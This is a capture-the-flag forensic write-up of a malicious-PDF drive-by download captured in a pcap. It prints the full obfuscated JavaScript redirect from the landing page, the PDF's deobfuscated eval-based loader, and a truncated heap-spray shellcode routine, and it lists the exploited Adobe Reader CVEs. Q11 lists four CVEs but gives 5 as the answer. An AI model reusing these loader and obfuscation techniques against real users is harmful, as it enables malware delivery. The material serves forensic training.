Forensic - GetPDF

📜Scenario

PDF format is the de-facto standard in exchanging documents online. Such popularity, however, has also attracted cyber criminals in spreading malware to unsuspecting users. The ability to generate malicious pdf files to distribute malware is a functionality that has been built into many exploit kits. As users are less cautious about opening PDF files, the malicious PDF file has become quite a successful attack vector.
The network traffic is captured in lala.pcap contains network traffic related to a typical malicious PDF file attack, in which an unsuspecting user opens a compromised web page, which redirects the user’s web browser to a URL of a malicious PDF file. As the PDF plug-in of the browser opens the PDF, the unpatched version of Adobe Acrobat Reader is exploited and, as a result, downloads and silently installs malware on the user’s machine.

Q1 - How many URL path(s) are involved in this incident ?

$ tshark -r Malicious-Portable/lala.pcap -T fields -e "http.request.full_uri" | sort -u

http://blog.honeynet.org.my/favicon.ico
http://blog.honeynet.org.my/forensic_challenge
http://blog.honeynet.org.my/forensic_challenge/
http://blog.honeynet.org.my/forensic_challenge/fcexploit.pdf
http://blog.honeynet.org.my/forensic_challenge/getpdf.php
http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe

Answer : 6

Q2 - What is the URL which contains the JS code ?

Using wireshark we extract all the objects present in the capture.
File -> Export -> HTTP
The following files are obtained :
'favicon(1).ico'   favicon.ico   fcexploit.pdf   forensic_challenge 'forensic_challenge(1)'   getpdf.php the_real_malware.exe
By analysing the forensic_challenge file we find the URL

$ cat forensic_challenge

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://blog.honeynet.org.my/forensic_challenge/">here</a>.</p>
<hr>
<address>Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch proxy_html/3.0.1 mod_ssl/2.2.14 OpenSSL/0.9.8k Server at blog.honeynet.org.my Port 80</address>
</body></html>

Answer : hxxp://blog.honeynet.org.my/forensic_challenge/

Q3 - What is the URL hidden in the JS code ?

To extract the JS script we identify a package HTTP
Right Clic -> Follow -> HTTP stream

<html>
<body>
<!-- 
	ANYTHING written in this HTML file (the file itself or the code inside it) is solely for the purpose of Honeynet Project Forensic Challenge. 
	Any usage towards this file and its content are at your own risk. 
	The author will not be responsible if any of those brings harm to you or others. 
	This material is for training and educational purposes. 
	You have been warned. 
-->
<script>
var DepanNegw = window;
var DexeTelae = -44;
DexeTelae += 45;
XayeZebah = 'nedajemac';
var GaDemee = 'e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, '');
ZavevTa = 'fazemezarawaseb';
var MezRai = parseInt;
var DayahDet = 'zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame bayap def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer magemefele xelawece denew jafelev haweqa kel vatabaser mag vejefama xeca canapevezejev benaper gezazevaja zeyaxaf wehekeh jecalava set senajaj re kameken bazafakaqewate zaralek yecele kak s hexebeka heha jeyeteg sase wayefewa tey gawewem wefaravavepayeke xedevec gavayedegeqer casehes watenanesajet jelagal payevexebe pejasep heqefagabexemew deheler vejegeca hece rafenadamenaxe jaz fex hekases pazetepajamelew cerasej nevayezabevepeke pex gey dac g dezaleza kekeqebe peyemaf sevanededa cefagey defef cexaqehe sebex galahal zadaxaran lava falamedejegase set law mefe wa mex ces nam j xaxaped gexeqageb feqeled daseze tehadeh zeheteyera xanahef wepahena xarakel gadazecaq tabexape dareq seje lejegagaxavade haf jaz cewe me cag kem fed h legefaz taw keyacah wefereweverewaze rapecame kas fagavev facez yefeley lareke seperene gav lece gahepegesafeve dez gen yeje s waz qas xap c hademax mezezah qepawehe vad zejates pe cehajeg sabebaseqeseda sekesav nebeda cagareg kec fexewel bejewagedegeqene bajesade lav pasepad baraj xecavan vedepe veranake vej heva kejajemacajada wez saj vele x qaj vad fag y qetamefe jaxa kamatare net zeheweh jeme bale cexebedeleneye dab vev kekaxex jetecajek lejekabe qalef bevegeye caxeb beleteqe r hele saxafexazat baz dehakajegeqeneke met mefepexafecebera qwertyu iop asdfghj klzxcvbnmqwer tyuiopa sdfghjklzxcvbnmq hjklzxc vbnmqwer tyu iopasdfghjklzxc vbnmqwe rtyuiopas dfghjkl zxcvbnmqwertyuio pasdfgh jklzxcvbnmqwert yuiopas dfghjk lzxcvbnm qwertyuiop asdfghj klzxcvbnmqwerty uiopasd fghjkl zxcvbnmq werty uio pasdfghjklzxcvb nmqwert yuiopasdfghjklzx cvbnmqwe rty uiopasd fghjklzx uio pasdfghjklzxcvb nmqwert uiopasdfghjklz qwertyui opasdfghjk xcr vbnmqwertyuiopar sdfghjr klzxcvr bnmqwer rtyuiopasdfghjkr lzxcvbnr mqr wertyur iopasr dfghjkr lzxcvbnmqwertyr uiopasdr fghr jklzxcr vbnmqwertr yuiopar sdfr ghjklr zxcvbnmqwertyuir opasdfr ghjr klzxcvr bnmqwertr yuiopar sr dfghjkr lzxcvbnmqwerr dfghjkr lzxcvbnmqwerr tyuiopr asdfgr hjklzxr cvbnmqwertyuior pasdfgr hjklzxcr vbnmqwr ertyur met mefepexafecebera xanahef wepahena feqeled daseze tabexape dareq zexelede l cefagey defef hademax mezezah req batekeqaheteceh zateyene c zekeqay ratevecek veheleqe k dec tec xece jefexazeqayefes cama bapevexeladet keh lanawebasegecaja qefejev qepetekene dacegas relevaj fecasece ber veyayes ba kajebed savaketegemeqe wepecer lamege tere ratavacevejezax gey dasalaje gav yepakekehe'.split(' ');
var ZeJexn = '';
var SerayYafags = String;
var KesXanavn = -50;
KesXanavn += 66;
XadHef = 78;
var BeZao = 47;
BeZao += -47;
var FeceSabejo = -46;
FeceSabejo += 48;
GebJep = 92;
var SeWajec = 'ftr9wogmBwJCW5h6aixrPRCs1ZonjHjdjKueMkD'.replace(/[t9wgBwJW56ixPRs1ZnjHjjKuMkD]/g, '');
MaqTa = 5;
GaDemee = DepanNegw[GaDemee];
SeWajec = SerayYafags[SeWajec];
for (YajMedei = BeZao; YajMedei <DayahDet.length - 1; YajMedei += FeceSabejo) ZeJexn += SeWajec(MezRai((DayahDet[YajMedei + BeZao].length - 1).toString(KesXanavn) + (DayahDet[YajMedei + DexeTelae].length - 1).toString(KesXanavn), KesXanavn));
GaDemee(ZeJexn); </script>
</body>
</html>

Answer :  hxxp://blog.honeynet.org.my/forensic_challenge/getpdf.php

Q4 - What is the MD5 hash of the PDF file contained in the packet ?

$ md5sum fcexploit.pdf

659cf4c6baa87b082227540047538c2a  fcexploit.pdf

Answer :  659cf4c6baa87b082227540047538c2a

Q5 - How many object(s) are contained inside the PDF file ?

$ pdfid fcexploit.pdf

PDFiD 0.2.8 fcexploit.pdf
 PDF Header: %PDF-1.3
 obj                   19
 endobj                18
 stream                 5
 endstream              5
 xref                   1
 trailer                1
 startxref              1
 /Page                  2
 /Encrypt               0
 /ObjStm                0
 /JS                    1
 /JavaScript            1
 /AA                    0
 /OpenAction            1
 /AcroForm              1
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /EmbeddedFile          1
 /XFA                   1
 /Colors > 2^24         0

Answer : 19

Q6 - How many filtering schemes are used for the object streams ?

$ pdf-parser fcexploit.pdf | grep -i filter

    /Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
    /Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
    /Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
    /Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]

Answer : 4

Q7 - What is the number of the 'object stream' that might contain malicious JS code ?

$ pdf-parser fcexploit.pdf

obj 4 0
 Type: /Action
 Referencing: 5 0 R <- Reference to obj 5

  <<
    /Type /Action
    /S /JavaScript
    /JS 5 0 R      <- JS script
  >>

obj 5 0
 Type:
 Referencing:
 Contains stream

  <<
    /Length 395
    /Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
  >>

Answer : 5

Q8 - Analyzing the PDF file. What 'object-streams' contain the JS code responsible for executing the shellcodes? The JS code is divided into two streams. Format: two numbers separated with ','. Put the numbers in ascending order

First we identify and dump all of the object that contain '/Filter' flag

$ python2 pdf-parser.py --raw -o 7 -f fcexploit.pdf -d obj7
obj7: ASCII text, with very long lines (55971), with no line terminators (hex string)
$ python2 pdf-parser.py --raw -o 9 -f fcexploit.pdf -d obj9
obj9: ASCII text, with very long lines (65536), with no line terminators (formatted as ‘X_170987743**’)
$ python2 pdf-parser.py --raw -o 10 -f fcexploit.pdf -d obj10 (formatted as ‘U_155bf62c9aU_7917ab39**’)

Note : in python3 pdf-parser fails to decompress ASCII85 but not in python2

We can also extract obj 5 that we find on Q7
I use the Javascript Beautify on Cyberchef to make it easier to read

var SSS = null;
var SS = 'ev';
var $S = '';
$5 = 'in';
app.doc.syncAnnotScan();
S$ = 'ti';
if (app.plugIns.length != 0) {
	var $$ = 0;
	S$ += 'tl';
	$5 += 'fo';
	____SSS = app.doc.getAnnots({ nPage: 0 });
	S$ += 'e';
	$S = this.info.title;
}
var S5 = '';
if (app.plugIns.length > 3) {
	SS += 'a';
	var arr = $S.split(/U_155bf62c9aU_7917ab39/);
	for (var $ = 1; $ < arr.length; $++) {
		S5 += String.fromCharCode('0x' + arr[$]);
	}
	SS += 'l';
}
if (app.plugIns.length >= 2) {
	app[SS](S5);
}

En analysant le scrip JS on identifie la variable SSS qui fait des annotations sur des pages
Après recherche parmi les différentes objet contenant le Type: Page ou Pages
On identifie l'obj 3 qui semble louche car contenant 3 Objects dans Referencing

obj 3 0
 Type: /Page
 Referencing: 6 0 R, 8 0 R, 2 0 R

  <<
    /Type /Page
    /MediaBox [ 0 0 612 792 ]
    /Annots [ 6 0 R 8 0 R ]
    /Parent 2 0 R
  >>

So we analyse Obj 2, 6 and 8
We notice that Objects 6 and 8 perform Annotation on Objects 7 and 9
Two of the three Obj identified with the /Filter flag at the beginning of our investigation

obj 6 0
 Type: /Annot
 Referencing: 7 0 R

  <<
    /Type /Annot
    /Subtype /Text
    /Name /Comment
    /Rect [ 200 250 300 320 ]
    /Subj 7 0 R
  >>
  
obj 8 0
 Type: /Annot
 Referencing: 9 0 R

  <<
    /Type /Annot
    /Subtype /Text
    /Name /Comment
    /Rect [100 180 300 210 ]
    /Subj 9 0 R
  >>

In the second part of the obj 5 code, the variable arr splits the string using the same format found in Object 10. We can do the same for Object 10 :

$ sed 's/U_155bf62c9aU_7917ab39//g' obj10 | xxd -r -p > obj10.out

____SS = 1;
____$5 = ____SSS[____SS].subject;
____$S = 0;
____$ = ____$5.replace(/X_17844743X_170987743/g, '%');
____S5 = ____SSS[____$S].subject;
____$ += ____S5.replace(/89af50d/g, '%');
____$ = ____$.replace(/\n/, '');
____$ = ____$.replace(/\r/, '');
____S$ = unescape(____$);
app.eval(____S$);

The ‘replace‘ commands match the formatting in Object 9 and Object 7.
We can reformat using the same method :

$ sed  's/X_17844743X_170987743/%/g' obj9 | xxd -r -p > obj9.out
$ sed 's/89af50d/%/g' obj7 | xxd -r -p > obj7.out
$ cat obj9.out obj7.out >> fulloutput.out

var w = new String();
var c = app;

function s(yarsp, len) {
        .....
}
var m = new String("");

function cG() {
            var chunk_size, payload, nopsled;
        .....
}
        .....
function gX() {
        var basicZ = '';
                // notepad.exe payload
        var shellcode = unescape("%uc931%u64b1 ..... %ubcae");
}
        .....
var basicU = new Date();
this.updateO = false;
nO();
var mUpdate = function() {};

So when you merge Obj 7 and 9 together you can find the shellcode var

Answer : 7,9

Q9 - The JS code responsible for executing the exploit contains shellcodes that drop malicious executable files. What is the full path of malicious executable files after being dropped by the malware on the victim machine ?

We find 4 differents version of the shellcode we search in the js code. We can use SCDBG to emulate and execute the each version to find what happened when the shellcode is launched. We notice that he call the URLDownloadToFileA API and download the a.exe file.

Answer : C:\WINDOWS\system32\a.exe

Q10 - The PDF file contains another exploit related to CVE-2010-0188. What is the URL of the malicious executable that the shellcode associated with this exploit drop ?

When extracting the Urls from Q1, we identify the url : hxxp://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe
In addition, when extracting objects from the wireshark frame, we have this file "the_real_malware.exe" ce qui confirme l'url

Answer : hxxp://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe

Q11 - How many CVEs are included in the PDF file ?

CVE-2009-0927 -> function updateE -> Adobe – ‘Collab.getIcon()’ Local Buffer Overflow (Metasploit)
CVE-2007-5659 -> function gX -> Adobe – ‘Collab.collectEmailInfo()’ Local Buffer Overflow
CVE-2008-2992 -> functioncN -> Adobe Reader – ‘util.printf()’ JavaScript Function Stack Overflow
CVE-2009-4324 -> function cG -> Adobe – ‘Doc.media.newPlayer’ Use-After-Free

Answer : 5

Supportive resources

• PDF format structure
• Portable document format

Helpful Tools

• de4js
• pdfid
• pdfparser
• peepdf
• PDFStreamDumper
• WireShark
• tshark
• scdbg
• NetworkMiner